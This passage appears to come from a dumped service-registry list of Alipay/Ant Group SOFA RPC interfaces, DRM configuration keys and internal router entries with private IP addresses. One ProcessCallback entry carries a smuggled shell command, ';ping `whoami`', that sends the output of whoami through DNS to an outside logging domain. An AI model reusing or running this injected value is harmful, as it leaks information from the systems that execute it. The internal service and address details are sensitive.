istoryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:sffgroup-minidevservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.equity.index.CampIndexFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileanti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.eccommon.monitor.drm.resource.LoggerSwitchControlResource.msgrecvOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.loadUid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbposmng.common.service.facade.api.DeviceManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.exception.CommonExceptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apsdk.settlement.apis.HoldMerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.TaskTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zfcertifycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.ConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmciemng.common.service.facade.riskctrl.CieChangeCtrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.twoCodeSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.industry.IndustrygwMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbsalesSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.minBuyAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.category.StandardCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_openitemcore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.44.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.finaccenter.facade.api.ChkGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:omoaidbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ExpressCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SalesPlanService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.weibo.WeiboStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fininfo.finfotransTddlDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.combmng.common.service.facade.trade.TradeInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.CategoryDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cfpcenter_misc_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LINKE#@#DEFAULT_INSTANCE_ID#@#SOFA","pcreditauthprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcbmarketcenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:homeproxy#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.grmcore.common.service.facade.saferun.SafeRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antconnector@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PointBudgetToolBusinessDrmResource.pointBudgetProductCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mindv.survey.job.JobInfoAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.account.endpoint.facade.AccountMappingRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:insservicbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileic.common.service.facade.VerifyCallbackFacade:1.0:transferprod_withdraw_withdraw_ic_mobileClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.GinSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.risklib.common.mw.wtable.client.WTableReadClient:1.0:velocity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.metadata.common.logic.facade.api.LogicalTableMetaService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.merchantinfo.ShopBaseInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.104.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.qualitymeasure.service.facade.api.AcpReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageBehaviorResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechannel.senior.common.service.facade.cardbindingprod.api.CardBindingPCFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.baas.endpoint.plus.facade.InfoSecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.namemodify.MiniNameModifyCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:unitradeadapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.marketing.facade.promotion.service.manager.PermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropcn.common.service.facade.api.TaskSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PromotePageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finfoprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.mif.common.service.facade.MerchantProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCINSTECOPROD-SCHEDULE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDMz.ssrf.noble.log.lynnshare.cc;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.group.ItemGroupQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TradeMergeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.jbDescTemplate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoaftermarket.common.service.common.AutoScheduleTaskFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.camphome.facade.CampHomeConfigControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FinPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.MenuService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.ResourceManageFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.finslip.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cmscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.client.BizListQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.MessageBlackListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.enableNewCouponTemplateCreate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.autooperate.MerchantExtPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.productinfo.ProductInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingboss.biz.shared.manager.progov.FundClearingRuleModifier:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.TriggerInstanceOpenApi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.98.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.acbillingcore.common.service.facade.ArMonthlyBillSynFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchbasecommon.core.rule.service.api.RuleApiTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.SendMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.PaymentIdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatMessageV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mysqlapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.common.service.facade.voucher.api.EinvVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.FundFlowCheckedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.homepage.remind.service.RemindFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaSummaryQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edubizsp.common.service.facade.superstucode.StuCodeCloseStuCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.ding.DingUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icrowdservice.facade.tag.TagFacade:1.0:icrowdservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantSubConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.pattern.facade.SentencePatternService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimprod.common.service.InsClaimOvertimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mfinstockprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acassistant.common.service.facade.RuleFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileapp.common.service.facade.rpcnotify.GwRpcUpdateNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.biz.client.MessageProducerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherDeleteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.troublehunter.service.BizScenarioQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.timeline.endpoint.sofarest.NoticeSofaRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.dwalm.facade.api.FmRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.equitymarketscore.common.service.facade.api.ThirdPartyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INSPLATFORM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dt.dataphin.security.auth.facade.apply.AuthApplyService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.ControlApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.FinResourceBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcsc.common.service.facade.holographic.DataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.air.service.facade.RecService:1.0:recmixer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.132.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.aclinkedcore.common.service.facade.PipelineInstanceOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.merchant.common.service.facade.MerchantCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmobile.common.service.facade.render.TemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstoperation.common.service.facade.api.orgconfig.GlobalConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:stockassetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmDailyDutyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.ColumnArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.alert.CensorAlertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:quezaomng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.bizcontext.common.service.facade.alipay.api.query.AlipayBizContextQueryService:1.0:zbizcontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerc.common.service.facade.insightanalysis.CubeAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-test4twa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.84.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankTotalSendClearFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcinstprod.common.service.facade.api.fund.FundManagePlatformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instranscore.common.facade.InsPaymentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.BenefitConfigService:1.0:mngBenefitConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.config.WithdrawConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.definition.AtomicIndexOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.policy.PolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:fundmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CacheLoaderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pucprod.common.service.facade.config.OffineInstConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ldprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bpaas.ecomerchant.facade.account.admin.AccountQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeVariable1,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.operator.LifeAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.EntityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abnclprod.facade.taskflow.api.config.AbnSysConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.FeeChargeDiscountCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturemng.portable.sql.facade.FeatureServingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TaxiMachineDriverSigninInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:bkloanfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.point.UserPointFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantInstRelationQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_PAIDCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscenter.service.mail.facade.MailTemplateQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:fundapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zonemng.query.facade.api.ZoneMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservice.common.service.facade.api.extensionexecutor.ExtensionExecutorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_7305_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.amlmatrix.core.service.common.degradebreak.manager.AmlDegbreakAnalyze#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:createAreaAdminCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.wireless.facade.TerminalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promorulecenter.common.service.facade.RuleModelManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitymegadata.facade.repository.RepositoryFacadeService:1.0:bosonRepositoryFacadeServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.creditusage.CreditUsageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.ChargeOffBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.OpenInnerAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mfrontgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.TagManagementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.indicator.api.ICeresDBIndicatorReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.LifeAppStatusFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.IAntJobRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.bizfundprod.common.service.facade.account.AccountQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxFlatOrderTaskExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.biz.service.impl.test.SoapUITest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_merchant_portraitPartnerMerchantGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.176.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","findataprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.common.quickaccess.facade.service.proxy.platform.QuickaccessPlatformService:1.0:openacc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaconfigsvr.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoscene.core.service.action.repo.FinsActionConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.RecContentManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.ZbdmMeta